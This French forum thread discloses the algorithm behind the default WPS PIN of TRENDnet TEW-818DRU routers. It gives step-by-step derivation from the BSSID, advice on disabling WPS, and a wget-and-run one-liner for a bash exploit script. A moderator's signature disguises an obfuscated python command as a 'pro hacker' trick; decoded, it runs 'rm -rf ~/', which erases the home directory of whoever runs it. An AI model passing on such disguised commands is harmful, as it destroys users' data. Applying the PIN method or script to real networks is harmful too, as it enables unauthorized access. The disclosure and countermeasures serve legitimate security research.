Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 29-06-2014 19:57:15

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

TRENDnet TEW-818DRU "ac19000" : full disclosure WPS PIN

1403903249.png


  TRENDnet est un fabricant californien  de matériel réseau qui propose une gamme assez ample de produits, switchs, routeurs, vidéo surveillance.
   
  Ils disposent d'une belle page ou nous pouvons voir les nombreux produits proposés.
  Avec un truc assez sympa, et fort pratique , vous allez voir pourquoi très bientôt; c'est un émulateur d'interface de configuration du routeur.
  Vous pouvez ainsi vous balader dans l'interface de configuration comme si vous y étiez. 
 
  Allez, soyons fous! Nous allons voir d'un peu plus près le produit star 


1404002299.png

Avec son fabuleux ac1900 qui vous permettra de vivre vos sessions d'aérobic pleinement grâce à son très haut débit.

1403905486.png


  Et il vous permettra de pavoiser devant de jolies étudiantes en licence de psycho, même si vous avez une écharpe ridicule autours du coup!
  C'est définitivement  ce qu'il nous faut...

Parce que ; pourquoi s'arrêter sur un détail tel que l'absence de bonnes antennes externes?
  Même si il va quand même falloir  casser la tirelire...

1403906387.png

Mmmmmmm.. non, ce ne sont pas des roubles, désolé...
... on remplacera les steackshachés  des gosses par des pattés pour chiens... ils avaient bien aimé celui aux quatre viandes avec son complément poil brillant la dernière fois. 
    Et les cheuveux... lisses et soyeux! Plus besoin d'après shampoing... je m'égare... l

TRENDnet ac1900(TEW-818DRU)  Full disclosure génération du PIN par défaut

 
Comme je vous le disait on peut donc visiter l'interface de configuration grâce à ces superbes émulateurs : émulateur TEW-818DRU

C'est fort bien fait n'est-ca pas?

Au niveau de la configuration du WPS elle se trouve dans la catégorie wireless 2.4 GHz et wireless 5 ghz
C'est un PIN unique pour le réseau 2.4 Ghz et pour le réseau 5 Ghz
Il est non configurable
Il est activé par défaut.


1403906994.png

Pas bien...
à 200€ le routeur on pourrait attendre mieux...

Nous avons trois ssid possibles

1403912063.png


Faisons donc une conversion à décimal pour voir si par chance ce n'est pas le même algorithme que dans WPSPIN ( le "zaocheshung" pour lui donner un nom )


  LAN                     MAC Address    00:90:4C:0F:F4:D2   > conversion décimal >   1045714
  2.4GHz Wireless   MAC Address    00:90:4C:10:E4:D2   > conversion décimal >   1107154
  5GHz Wireless      MAC Address    00:90:4C:0E:54:D2   > conversion décimal >   0939218

Pour un PIN qui est 38209444 , le checksum on l'oublie pour le moment , nous cherchons 3840944

Comme ça ça ne marche pas tongue
Prenons les choses à l'envers, à quelle fin de mac correspond mon PIN?

3820944 en hexadécimal fait 3A4D90

pour LAN                     MAC Address     00:90:4C:0F:F4:D2
pour 2.4GHz Wireless   MAC Address     00:90:4C:10:E4:D2
pour 5GHz Wireless      MAC Address     00:90:4C:0E:54:D2


Ça ne marche pas...  tongue

Dans l'algorithme de WPSPIN, lorsque la fin de bssid donne un valeur supérieur à 999999 lorqu'il est converti à décimal, les unités supérieurs, les dizaines de millions, sont supprimés

Ce qui fait que dans la majorités des cas  nous avons deux fin de BSSID qui génèrent le même PIN

    1)    Une fin de bssid supérieure à 98:96:7F (9999999 en décimal )
    2)    Et une autre inférieure à 98:96:7f

essayons donc avec notre deuxième fin de bssid possible qui à comme valeur décimal 13820944

  Ça nous fait   D2E410

                                    big_smile

et la mac wireless du réseau 2.4 Ghz c'est ... 00:90:4C:10:E4:D2


   Et oui, il s'agit d'inverser l'ordre des trois derniers octets de la mac avant d'effectuer la conversion à décimal tongue

      1 - si le bssid est XX:XX:XX:AA:BB:CC
   
      2 - la chaine constituée pour générer le PIN est CCBBAA
   
      3 - que nous convertissons en base décimale 13417386
   
      4 - Nous retirons les dizaines de millions si notre valeur est supérieur à 999999 ce qui nous fait 3417386   
   
      5 - Et nous ajoutons le checksum wps pour avoir notre PIN complet 34173862







Bon je vous laisse, j'ai quelques pages de conf TRENdnet à aller visiter... tongue
...j'ai cru voir d'autres choses intéressantes, des clefs WPA par défaut de 9 chiffres et autres, des PIN WPS qui me rappelaient pas mal du WPSPIN....

allez jeter un coup d'oeil ...

et si le coeur vous en dit et n'hésitez pas à participer à notre grand jeux "faille de l'été" en partenariat avec TRENdnet.

Le vainqueur se verra remettre une magnifique ISO de Red Star 3.0 server avec un fond d'écran unique dédicacé par M1ck3y et Kin Jomg il 2.

Et un stage  WPS crack organisé par TRENDnet et bouygues telecom.

CONTRES MESURES & CONSEILS :
-  Comme d'habitude nous vous recommendons de configurar votre routeur vous même dès l'acquisition et de ne jamais vous fier de la configuration par défaut...
  Changer les identifiants, désactivez le WPS, changez la passphrase WPA...
  L'expérience nous montre que même si il est désactivé depuis l'interface web, le WPS peut être toujours activé.
  Un petit test avec reaver ou bully s'impose.
  Dans le cas ou le WPS est toujours activé ( cf: c'est malheureusement ce qui arrive avec  certains modèles lynksis, cisco d-link, la BBox-XXXXXX de sagem - là c'est plus simple, il n'y a aucun endroit pour configurer le wps et il est acivé ) il ne vous reste plus qu'à dés-habiliter le réseau sans fil
  La bonne nouvelle c'est que le routeur est compatible avec dd-wrt, c'est donc une bonne idée que d'installer dd-wrt qui vous permettra de faire bien plñus de choses que l'interface d'administration TRENDnet, certes bien faite, mais pas géniale non plus.

  Le meilleur conseil à donner et celui d'y penser à deux fois avant d'acheter un routeur à 239$... êtres vous sûr que chaque €  soit justifié ...


edit 7-07-2015

l'algorithme marche aussi avec la version 2 (ac3200) .
https://packetstormsecurity.com/files/1 … osure.html

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 29-06-2014 21:50:17

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : TRENDnet TEW-818DRU "ac19000" : full disclosure WPS PIN

<3


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 29-06-2014 23:01:46

unsuns06
Membre Radioactif
Inscription : 10-04-2013
Messages : 68

Re : TRENDnet TEW-818DRU "ac19000" : full disclosure WPS PIN

Chapeau bas ! wink

Hors Ligne

#4 30-06-2014 08:36:28

refoelite
Membre
Inscription : 11-06-2014
Messages : 18

Re : TRENDnet TEW-818DRU "ac19000" : full disclosure WPS PIN

Brillant !!

Hors Ligne

#5 30-06-2014 18:07:27

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 362

Re : TRENDnet TEW-818DRU "ac19000" : full disclosure WPS PIN

C'est du très lourd! biere

Hors Ligne

#6 02-07-2014 03:30:13

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : TRENDnet TEW-818DRU "ac19000" : full disclosure WPS PIN

Bravo !

TRENDnet s'est déjà loupé sur ses caméras avec la faille qui permettait de voir sans mdp.

Hors Ligne

#7 19-07-2014 23:59:38

maripuri
Membre
Inscription : 09-04-2010
Messages : 22

Re : TRENDnet TEW-818DRU "ac19000" : full disclosure WPS PIN

Salutations à tous les amis... kcdtv est beaucoup kcdtv!   lol

Hors Ligne

#8 07-07-2015 17:56:33

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : TRENDnet TEW-818DRU "ac19000" : full disclosure WPS PIN

Juste pour signaler que j'ai pu constater l'utilisation du même algorithme pour la version 2 du dispositif, le flamboyant neuf "ac3200" sortit cette année.

trendnet7.jpg

  Du coup je me suis que ça valait la peine d'en parler "officiellement" :

Et comme ils préfèrent qu'il y ait un petit "exploit" pour illusterr la brèche  j'ai fais un petit script en bash très simple que vous pouvez télécharger ici : tdn.zip

En plus c'est du ac 3200 : ça change de WPSPIN et des box ZTE à 6 francs.  big_smile
  Le script est plus ou moins le même que celui du full disclosure "packt storm" avec un filtre bssid et la sortie un peu changée.
  pour le télécharger et le décomprimer et le lancer en une ligne et moins de temps qu'il en faut pour l'écrire:

wget https://www.wifi-libre.com/img/members/3/tdn.zip && unzip tdn.zip && cd tdn && bash tdn.sh

Bonne soirée! smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]